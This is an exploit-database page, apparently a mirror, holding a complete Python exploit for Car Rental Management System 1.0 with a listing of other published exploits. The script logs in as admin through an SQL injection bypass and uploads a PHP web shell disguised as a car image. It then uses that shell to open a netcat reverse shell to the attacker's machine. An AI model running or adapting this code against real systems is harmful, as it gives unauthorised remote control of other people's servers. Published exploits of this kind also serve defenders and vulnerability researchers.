To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload"

Author

Exploit author

"Fortunato Lodari"

Platform

Exploit platform

php

Release date

Exploit published date

2020-11-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Date: 09-11-2020
# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Debian 10 with apache2

# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
# on the victim system
#
# on the Attacker machine you must listen with NC on a port

import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
#foxlox#



payload = {"username":"' OR 1=1 limit 1#","password":"moana"}

proxies = { "http": "http://localhost:8080"}

#payload = "username=' OR 1=1 limit 1 #&password=ciao"

def deb(str):
    print("Debug => "+str)

def login():
    deb("Login...")
    session=requests.Session()
    url = mainurl+"/admin/ajax.php?action=login"
    #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
    r=session.post(url,payload, allow_redirects=False,proxies=proxies)
    cookie = r.headers["Set-Cookie"]
    deb(cookie)
    return cookie

def find_all(a_str, sub,lbegin,lend):
    start = 0
    start = a_str.find(sub, start)
    t=(a_str[start+lbegin:start+lend]).replace('"','')
    return t


def upload(c):
    deb("Getting cookie")
    c = c.split("=");cookie={c[0]:c[1]}
    deb("Sending payload")
    filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')}
    fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
    r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
    deb("Saved Machine");
    r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
    mid=find_all(r.content,'data-id=',8,11)
    deb("Machine id: "+mid)
    r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
    defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
    deb("Exploit url: "+defurl)
    #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
    exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
    print("Opening url: "+exploit)
    print("Don't forget to run: nc -nvlp "+sys.argv[3])
    os.system(exploit)


def usage():
    if len(sys.argv) < 4:
        print("Create a PHPShell for Car Rental Management System")
        print("example:")
        print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
        exit()


    
usage()
mainurl = sys.argv[1]
upload(login())

#fox
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-11-10 "Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload" webapps php "Fortunato Lodari"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49025/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.